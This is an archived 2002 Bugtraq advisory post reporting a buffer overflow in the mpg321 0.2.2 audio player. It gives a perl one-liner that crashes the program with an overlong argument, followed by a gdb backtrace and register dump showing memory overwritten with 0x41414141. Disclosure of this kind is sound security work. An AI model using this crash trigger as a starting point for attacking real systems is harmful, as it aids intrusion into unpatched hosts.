mpg321
From: -l0rt- (simon@snosoft.com)Date: 02/13/02
- Previous message: KF: "Re: Steady increase in ssh scans"
- Next in thread: Damian M Gryski: "Re: mpg321"
- Reply: Damian M Gryski: "Re: mpg321"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 12 Feb 2002 18:05:18 -0500 (EST) From: -l0rt- <simon@snosoft.com> To: <bugtraq@securityfocus.com>
I know that there have been older similar bugs, here is a new one that I
could find nothing about in the lists.
---------------------------------------
os : linux
distro : RH 7.1 and others
program : mpg321-0.2.2
issues : Possible remote exploitation
priority: low-medium
author : simon@snosoft.com
vendor : http://mpg321.sourceforge.net/
----------------------------------------
High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3.
Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew.
Uses code from various people. See 'README' for more!
THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
theory:
mpg123 accepts url's and may be used by other suid binaries or services.
A buffer condition exists in mpg321 that could allow for
remote/unwarrented command execution by means of a specailly formatted
URL or other input. mpg321 is not setuid or setgid.
fact:
mpg123 cores when it is passed the following string:
mpg123 `perl -e'print "A" x 10000'`
[simon@nova ~testing]$ mpg321 `perl -e'print "A" x 10000'`
High Performance MPEG 1.0/2.0/2.5 Audio Player for Layer 1, 2, and 3.
Version 0.59q (2001/Oct/13). Written and copyrights by Joe Drew.
Uses code from various people. See 'README' for more!
THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
Segmentation fault (core dumped)
[simon@nova ~testing]$
<snip>...
(gdb) bt
#0 getenv (name=0x40173473 "NGUAGE") at ../sysdeps/generic/getenv.c:87
#1 0x40070072 in guess_category_value (category=5,
categoryname=0x414c <Error reading address 0x414c: No such process>)
at dcigettext.c:1140
#2 0x4006f08f in __dcigettext (domainname=0x4016e51c "libc",
msgid1=0x40173b35 "File name too long", msgid2=0x0, plural=0, n=0,
category=5)
at dcigettext.c:512
#3 0x4006ed7d in __dcgettext (domainname=0x4016e51c "libc",
msgid=0x40173b35 "File name too long", category=5) at dcgettext.c:53
#4 0x400ccc38 in __strerror_r (errnum=36, buf=0x4017df40 "", buflen=1024)
at ../sysdeps/generic/_strerror.c:68
#5 0x400ccbdb in strerror (errnum=36) at strerror.c:30
#6 0x080497cf in mpg321_error (file=0xbfffd37d 'A' <repeats 200
times>...) at mpg321.c:66
#7 0x08049935 in main (argc=1094795585, argv=0x41414141) at mpg321.c:233
#8 0x41414141 in ?? ()
Error accessing memory address 0x41414141: No such process.
(gdb) info registers
eax 0xbfffd260 -1073753504
ecx 0x40173471 1075262577
edx 0x414c 16716
ebx 0x4017c534 1075299636
esp 0xbfffaf00 0xbfffaf00
ebp 0xbfffaf18 0xbfffaf18
esi 0x4017323d 1075262013
edi 0x41414141 1094795585
eip 0x40076a50 0x40076a50
eflags 0x210206 2163206
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-l0rt-
---------------------------------------------------------------------
Disclaimer: Any resemblance between the above views and those of
my employer, my terminal, or the view out my window are purely
coincidental. Any resemblance between the above and my own views is
non-deterministic. The question of the existence of views in the
absence of anyone to hold them is left as an exercise for the reader.
The question of the existence of the reader is left as an exercise for
the second god coefficient. (A discussion of non-orthogonal,
non-integral polytheism is beyond the scope of this article.)
---------------------------------------------------------------------
- Previous message: KF: "Re: Steady increase in ssh scans"
- Next in thread: Damian M Gryski: "Re: mpg321"
- Reply: Damian M Gryski: "Re: mpg321"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
